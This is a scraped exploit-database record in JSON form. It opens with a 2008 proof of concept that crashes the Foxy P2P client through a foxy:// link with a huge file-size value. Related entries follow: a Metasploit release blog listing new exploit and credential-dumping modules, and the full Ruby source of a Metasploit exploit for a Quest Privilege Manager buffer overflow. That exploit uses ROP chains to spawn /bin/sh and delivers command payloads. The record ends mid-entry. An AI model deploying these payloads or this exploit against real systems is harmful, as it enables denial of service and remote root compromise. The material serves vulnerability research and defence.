ID 1337DAY-ID-6553 Type zdt Reporter Styxosaurus Modified 2008-06-17T00:00:00
Description
Exploit for unknown platform in category dos / poc
================================================
P2P Foxy Out of Memory Denial of Service Exploit
================================================
P2P Foxy Out of memory Exploit
# Vulnerability Discovered by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Foxy is one of the most popular P2P software in Chinese users
# http://tw.gofoxy.net/
#
# It starts to request more memory and freeze
# as when "&fs=" meet some large magic point.
<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4
&dn=music.wmv&fs=1000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
0000000000000000000000000'>Music.wmv</a>
# 0day.today [2018-03-02] #
{"hash": "22e249ad308eb24a820a2ceaf0e82e087895a361e0d8184b3d61208ad1e3534f", "id": "1337DAY-ID-6553", "lastseen": "2018-03-03T01:34:20", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "a8fd58582d3855e084f2a635563d6788", "key": "href"}, {"hash": "4c5ea32d1939ad6d6bdc0925aa7f3af3", "key": "modified"}, {"hash": "4c5ea32d1939ad6d6bdc0925aa7f3af3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "33827becc9e2a6b776ce76aed5197219", "key": "reporter"}, {"hash": "9f817eebfafe176c97f725909aa69190", "key": "sourceData"}, {"hash": "d77010822a7d441094405d743ca40e6e", "key": "sourceHref"}, {"hash": "bb66731e0753c6f12a7de79c27220fe3", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27767"]}], "modified": "2018-03-03T01:34:20"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6553", "description": "Exploit for unknown platform in category dos / poc", "title": "P2P Foxy Out of Memory Denial of Service Exploit", "history": [{"bulletin": {"hash": "8a7a4abf2520c5e73d52feb9169e2c2def9fc74aee81f51740ada75811d6a84a", "id": "1337DAY-ID-6553", "lastseen": "2016-04-19T10:08:56", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T10:08:56"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "4c5ea32d1939ad6d6bdc0925aa7f3af3", "key": "published"}, {"hash": "33827becc9e2a6b776ce76aed5197219", "key": "reporter"}, {"hash": "bb66731e0753c6f12a7de79c27220fe3", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "e6bd769c1c12894ee6e82d04c75a30f6", "key": "sourceHref"}, {"hash": "4c5ea32d1939ad6d6bdc0925aa7f3af3", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "0966bb03329ba184f403b2c1d1f6eb75", "key": "sourceData"}, {"hash": "2edf309009137fd077d0abfc09efda10", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/6553", "description": "Exploit for unknown platform in category dos / poc", "viewCount": 0, "title": "P2P Foxy Out of Memory Denial of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "================================================\r\nP2P Foxy Out of Memory Denial of Service Exploit\r\n================================================\r\n\r\n\r\n\r\nP2P Foxy Out of memory Exploit\r\n\r\n# Vulnerability Discovered by Styxosaurus\r\n# Styxosaurus [at] gmail [dot] com\r\n#\r\n# Foxy is one of the most popular P2P software in Chinese users\r\n# http://tw.gofoxy.net/\r\n#\r\n# It starts to request more memory and freeze \r\n# as when \"&fs=\" meet some large magic point.\r\n\r\n\r\n<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4\r\n&dn=music.wmv&fs=1000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000\r\n0000000000000000000000000'>Music.wmv</a>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-06-17T00:00:00", "references": [], "reporter": "Styxosaurus", "modified": "2008-06-17T00:00:00", "href": "http://0day.today/exploit/description/6553"}, "lastseen": "2016-04-19T10:08:56", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "================================================\r\nP2P Foxy Out of Memory Denial of Service Exploit\r\n================================================\r\n\r\n\r\n\r\nP2P Foxy Out of memory Exploit\r\n\r\n# Vulnerability Discovered by Styxosaurus\r\n# Styxosaurus [at] gmail [dot] com\r\n#\r\n# Foxy is one of the most popular P2P software in Chinese users\r\n# http://tw.gofoxy.net/\r\n#\r\n# It starts to request more memory and freeze \r\n# as when \"&fs=\" meet some large magic point.\r\n\r\n\r\n<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4\r\n&dn=music.wmv&fs=1000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000\r\n0000000000000000000000000'>Music.wmv</a>\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "published": "2008-06-17T00:00:00", "references": [], "reporter": "Styxosaurus", "modified": "2008-06-17T00:00:00", "href": "https://0day.today/exploit/description/6553"}
{"rapid7community": [{"lastseen": "2017-05-27T03:53:29", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:ee0b1b3b-bbf2-4606-8373-d3040813f239] --><div class=\"jive-rendered-content\"><p>It has been an intense couple of weeks in infosec since the last Wrapup and we've got some cool things for you in the latest update.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Hacking like No Such Agency</h2><p>I'll admit I was wrong. For several years, I've been saying we'll never see another bug like <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms08_067_netapi\" target=\"_blank\">MS08-067</a>, a full remote hole in a default Windows service. While I'm not yet convinced that MS17-010 will reach the same scale as MS08-067 did, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue</a> has already done substantial damage to the internet. Rapid7 bloggers covered a bunch of the details last week.</p><p><a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a></p><ul><li><a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">More on the EternalBlue Metasploit module</a></li><li><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7866\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose\">How to scan your network for the WannaCry vulnerability with InsightVM and Nexpose</a></li><li><a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">A deep dive into the WannaCry vulnerability</a></li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Since the last Wrapup, we've added an exploit for EternalBlue that targets x64 on the Windows 7 kernel (including 2008 R2). Updates are in the works to cover x86 and other kernels. There is also a scanner that can reliably determine exploitability of MS17-010, as well as previous infection with DOUBLEPULSAR, the primary payload used by the original leaked exploit.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>While EternalBlue was making all the headlines, we also landed an exploit module for the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fiis%2Fiis_webdav_scstoragepathfromurl\" target=\"_blank\">IIS ScStoragePathFromUrl bug (CVE-2017-7269)</a> for Windows 2003 from the same dump. This one requires the victim to have WebDAV enabled, which isn't default but <em>is</em> really common, especially on webservers of that era. Since 2003 is End of Support, Microsoft is not going to release a patch.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Dance the Samba</h2><p>In the few days since we spun this release, we also got a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fsamba%2Fis_known_pipename\" target=\"_blank\">shiny new exploit module for Samba</a>, the Unixy SMB daemon that runs on every little file sharing device ever. Expect some more discussion about it in the next wrapup. In the mean time, you can read more about the <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7892\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life\">effects of the bug</a>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>WordPress PHPMailer</h2><p>WordPress, which powers large swaths of the internet, embeds a thing called PHPMailer for sending email, mostly for stuff like password resets. Earlier this May, security researcher <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftwitter.com%2Fdawid_golunski\" rel=\"nofollow\" target=\"_blank\">Dawid Golunski</a> published a vulnerability in PHPMailer. The vulnerability is similar to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fphpmailer_arg_injection\" target=\"_blank\">CVE-2016-10033</a>, discovered by the same researcher. Both of these bugs allow you to control arguments to <code>sendmail(1)</code>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Now, vulns in WordPress core are kind of a big deal, since as previously mentioned, WP is deployed <em>everywhere</em>. Unfortunately (or maybe fortunately depending on your perspective), there is a big caveat -- Apache since 2.2.32 and 2.4.24 changes a default setting, <code>HttpProtocolOptions</code> to disallow the darker corners of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc2616\" rel=\"nofollow\" target=\"_blank\">RFC2616</a>, effectively mitigating this bug for most modern installations.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>The intrepid <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"18896\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/wvu\">@wvu</a> set forth to turn this into a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Metasploit</a> module and came out the other side with some shells and interesting discoveries that he'll cover in a more detailed technical post coming soon to a Metasploit Blog near you.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Railgun</h2><p>While Meterpreter is a very powerful and flexible tool for post exploitation on its own, sometimes you need the flexibility to go beyond the functionality that it provides directly. There may be a special API that needs to be called to extract a credential, or a certain system call that is required to trigger an exploit. For a long time, Windows Meterpreter users have enjoyed the use of the Railgun extension, which provides a way to do just that, similar to FFI (Foreign Function Interface) that is available in many scripting languages, but operating remotely. Thanks to an enormous effort by Metasploit contributor, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftwitter.com%2Fzerosteiner\" rel=\"nofollow\" target=\"_blank\">zeroSteiner</a>, Linux users can now also take advantage of Railgun, as it is now implemented as part of Python Meterpreter! This functionality opens the door to many new post-exploitation module possibilities, including the ability to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Flinux%2Fgather%2Fgnome_keyring_dump\" target=\"_blank\">steal cleartext passwords from gnome-keyring</a>. See <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7882\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/18/recent-python-meterpreter-improvements\">zeroSteiner’s blog</a> and his <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwarroom.securestate.com%2Finner-workings-railgun%2F\" rel=\"nofollow\" target=\"_blank\">more technical companion piece</a> for more details.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Steal all the things</h2><p>This week's update also continues the fine tradition of Stealing All the Things(tm). The aforementioned gnome-keyring dumper allows you to steal passwords from a logged-in user. In a similar vein, if you have a shell on a JBoss server, <code>post/multi/gather/jboss_gather</code> will give you all the passwords. The fun thing about both of these is that they work on the principle that you have permission to read these things -- there is no exploit here, and nothing to be patched.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>On the other side of things, <code>auxiliary/admin/scada/moxa_credentials_recovery</code> does take advantage of a vulnerability to grab all the creds from a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fblog.talosintelligence.com%2F2017%2F04%2Fmoxa-box.html\" rel=\"nofollow\" target=\"_blank\">cute little SCADA device</a>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>New Modules</h2><p><em>Exploit modules</em> <em>(10 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fcrypttech_cryptolog_login_exec\" target=\"_blank\">Crypttech CryptoLog Remote Code Execution</a> by Mehmet Ince</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fmisc%2Fquest_pmmasterd_bof\" target=\"_blank\">Quest Privilege Manager pmmasterd Buffer Overflow</a> by m0t exploits CVE-2017-6553</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fbuilderengine_upload_exec\" target=\"_blank\">BuilderEngine Arbitrary File Upload Vulnerability and execution</a> by Marco Rivoli, and metanubix</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fmediawiki_syntaxhighlight\" target=\"_blank\">MediaWiki SyntaxHighlight extension option injection vulnerability</a> by Yorick Koster exploits CVE-2017-0372</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Funix%2Fwebapp%2Fwp_phpmailer_host_header\" target=\"_blank\">WordPress PHPMailer Host Header Command Injection</a> by wvu, and Dawid Golunski exploits CVE-2016-10033</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fdupscts_bof\" target=\"_blank\">Dup Scout Enterprise GET Buffer Overflow</a> by Daniel Teixeira, and vportal</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fserviio_checkstreamurl_cmd_exec\" target=\"_blank\">Serviio Media Server checkStreamUrl Command Execution</a> by Brendan Coles, and Gjoko Krstic(LiquidWorm)</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fsyncbreeze_bof\" target=\"_blank\">Sync Breeze Enterprise GET Buffer Overflow</a> by Daniel Teixeira</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fiis%2Fiis_webdav_scstoragepathfromurl\" target=\"_blank\">Microsoft IIS WebDav ScStoragePathFromUrl Overflow</a> by Chen Wu, Dominic Chell, Lincoln, Rich Whitcroft, Zhiniang Peng, firefart, and zcgonvh exploits CVE-2017-7269</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption</a> by Dylan Davis, Equation Group, Sean Dillon, and Shadow Brokers exploits CVE-2017-0148</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><em>Auxiliary and post modules</em> <em>(6 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fadmin%2Fscada%2Fmoxa_credentials_recovery\" target=\"_blank\">Moxa Device Credential Retrieval</a> by K. Reid Wightman, and Patrick DeSantis exploits CVE-2016-9361</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fhttp%2Fintel_amt_digest_bypass\" target=\"_blank\">Intel AMT Digest Authentication Bypass Scanner</a> by hdm exploits CVE-2017-5689</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Fhardware%2Fautomotive%2Fcanprobe\" target=\"_blank\">Module to Probe Different Data Points in a CAN Packet</a> by Craig Smith</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Flinux%2Fgather%2Fgnome_keyring_dump\" target=\"_blank\">Gnome-Keyring Dump</a> by Spencer McIntyre</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Fmulti%2Fgather%2Fjboss_gather\" target=\"_blank\">Jboss Credential Collector</a> by Koen Riepe (koen.riepe</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Fmulti%2Fmanage%2Fautoroute\" target=\"_blank\">Multi Manage Network Route via Meterpreter Session</a> by todb, and Josh Hale \"sn0wfa11\"</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><h1>Get it</h1><p>As always, you can update to the latest Metasploit Framework with <code>msfupdate</code> and you can get more details on the changes since the last blog post from GitHub:</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-05-01T16%3A22%3A04-05%3A00%2B..%2B2017-05-19T13%3A46%3A54-05%3A00%2522\" rel=\"nofollow\" target=\"_blank\">Pull Requsts 4.14.15...4.14.21</a></li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.14.15...4.14.21\" rel=\"nofollow\" target=\"_blank\">Full diff 4.14.15...4.14.21</a></li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>To install fresh, check out the open-source-only <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers\" rel=\"nofollow\" target=\"_blank\">Nightly Installers</a>, or the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp\" target=\"_blank\">binary installers</a> which also include the commercial editions.</p></div><!-- [DocumentBodyEnd:ee0b1b3b-bbf2-4606-8373-d3040813f239] -->", "modified": "2017-05-26T19:06:43", "published": "2017-05-26T19:06:43", "href": "https://community.rapid7.com/community/metasploit/blog/2017/05/26/metasploit-wrapup", "id": "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "title": "Metasploit Wrapup", "type": "rapid7community", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-05-16T00:48:52", "bulletinFamily": "exploit", "description": "Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit). CVE-2017-6553. Remote exploit for Linux platform. Tags: Metasploit Framework", "modified": "2017-05-15T00:00:00", "published": "2017-05-15T00:00:00", "id": "EDB-ID:42010", "href": "https://www.exploit-db.com/exploits/42010/", "type": "exploitdb", "title": "Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow',\r\n 'Description' => %q{\r\n This modules exploits a buffer overflow in the Quest Privilege Manager,\r\n a software used to integrate Active Directory with Linux and Unix\r\n systems. The vulnerability exists in the pmmasterd daemon, and can only\r\n triggered when the host has been configured as a policy server (\r\n Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow\r\n condition exists when handling requests of type ACT_ALERT_EVENT, where\r\n the size of a memcpy can be controlled by the attacker. This module\r\n only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also\r\n vulnerable, but not supported by this module (a stack cookie bypass is\r\n required). NOTE: To use this module it is required to be able to bind a\r\n privileged port ( <=1024 ) as the server refuses connections coming\r\n from unprivileged ports, which in most situations means that root\r\n privileges are required.\r\n },\r\n 'Author' =>\r\n [\r\n 'm0t'\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2017-6553'],\r\n ['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic python perl ruby openssl bash-tcp'\r\n }\r\n },\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Targets' =>\r\n [\r\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',\r\n {\r\n exploit: :exploit_x64,\r\n check: :check_x64\r\n }\r\n ],\r\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',\r\n {\r\n exploit: :exploit_x86,\r\n check: :check_x86\r\n }\r\n ]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Apr 09 2017',\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(12345),\r\n Opt::CPORT(rand(1024))\r\n ]\r\n )\r\n end\r\n\r\n # definitely not stealthy! sends a crashing request, if the socket dies, or\r\n # the output is partial it assumes the target has crashed. Although the\r\n # daemon spawns a new process for each connection, the segfault will appear\r\n # on syslog\r\n def check\r\n unless respond_to?(target[:check], true)\r\n fail_with(Failure::NoTarget, \"Invalid target specified\")\r\n end\r\n\r\n send(target[:check])\r\n end\r\n\r\n def exploit\r\n unless respond_to?(target[:exploit], true)\r\n fail_with(Failure::NoTarget, \"Invalid target specified\")\r\n end\r\n\r\n request = send(target[:exploit])\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n sock.get_once\r\n print_status(\"Sending payload\")\r\n sock.put(payload.encoded)\r\n disconnect\r\n end\r\n\r\n # server should crash after parsing the packet, partial output is returned\r\n def check_x64\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n body = \"PingE4.6 .0.0.27\"\r\n body << rand_text_alpha(3000)\r\n\r\n request = head + body\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n res = sock.timed_read(1024, 1)\r\n if res.match? \"Pong4$\"\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n # server should crash while parsing the packet, with no output\r\n def check_x86\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n body = rand_text_alpha(3000)\r\n\r\n request = head + body\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n begin\r\n sock.timed_read(1024, 1)\r\n return Exploit::CheckCode::Unknown\r\n rescue ::Exception\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\n def exploit_x64\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\r\n ropchain = [\r\n 0x408f88, # pop rdi, ret\r\n 0x4FA215, # /bin/sh\r\n 0x40a99e, # pop rsi ; ret\r\n 0, # argv @rsi\r\n 0x40c1a0, # pop rax, ret\r\n 0, # envp @rax\r\n 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret\r\n 0xcacc013, # padding\r\n 0x408a98, # execve,\r\n 0\r\n ].pack(\"Q*\")\r\n\r\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\r\n body << rand_text_alpha(1600)\r\n body << ropchain\r\n body << rand_text_alpha(0x700 - body.size)\r\n\r\n head + body\r\n end\r\n\r\n def exploit_x86\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x108 ].pack(\"N\")\r\n head << [ 0xcc ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\r\n ropchain = [\r\n 0x8093262, # ret\r\n 0x73, # cs reg\r\n 0x804AE2C, # execve,\r\n 0xcacc013, # padding\r\n 0x8136CF0, # /bin/sh\r\n 0,\r\n 0\r\n ].pack(\"V*\")\r\n\r\n pivotback = 0x08141223 # sub esp, ebx ; retf\r\n writable = 0x81766f8 # writable loc\r\n\r\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\r\n body << rand_text_alpha(104)\r\n body << ropchain\r\n body << rand_text_alpha(0xb4 - body.size)\r\n body << [0x50].pack(\"V\")\r\n body << rand_text_alpha(0xc4 - body.size)\r\n body << [pivotback].pack(\"V\")\r\n body << [writable].pack(\"V\")\r\n body << rand_text_alpha(0x108 - body.size)\r\n\r\n head + body\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42010/"}], "zdt": [{"lastseen": "2018-01-01T19:01:38", "bulletinFamily": "exploit", "description": "This Metasploit modules exploits a buffer overflow in the Quest Privilege Manager, a software used to integrate Active Directory with Linux and Unix systems. The vulnerability exists in the pmmasterd daemon, and can only triggered when the host has been configured as a policy server ( Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow condition exists when handling requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This Metasploit module only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required). NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.", "modified": "2017-05-14T00:00:00", "published": "2017-05-14T00:00:00", "href": "https://0day.today/exploit/description/27767", "id": "1337DAY-ID-27767", 